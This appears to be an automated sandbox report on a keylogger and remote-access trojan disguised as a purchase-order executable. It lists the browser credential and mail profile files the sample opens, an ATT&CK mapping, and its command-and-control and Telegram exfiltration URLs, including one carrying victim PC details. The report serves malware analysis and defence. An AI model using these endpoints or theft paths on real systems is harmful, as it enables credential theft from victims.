Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3791088512.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Purchase Order 007823-PO# 005307.exe	37%	ReversingLabs	Win32.Trojan.Generic
Purchase Order 007823-PO# 005307.exe	32%	Virustotal		Browse
Purchase Order 007823-PO# 005307.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
us2.smtp.mailhostbox.com	1%	Virustotal	Browse
reallyfreegeoip.org	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	true	1%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	132.226.247.73	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2001/10/2024%20/%2013:45:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002B20000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://us2.smtp.mailhostbox.com	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002AE8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.office.com/lB	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20a	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://51.38.247.67:8081/_send_.php?L	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029FB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1350435179.000000000285E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
208.91.199.223	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523135
Start date and time:	2024-10-01 07:20:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Purchase Order 007823-PO# 005307.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/6@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 86 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Purchase Order 007823-PO# 005307.exe, PID 7704 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:20:56	API Interceptor	10723529x Sleep call for process: Purchase Order 007823-PO# 005307.exe modified
01:20:58	API Interceptor	10x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse
	https://contact-us-business-help-home-64844114956.on-fleek.app/	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	0LpFv1haTA.exe	Get hash	malicious	WhiteSnake Stealer, XenoRAT	Browse
188.114.96.3	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	update SOA.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
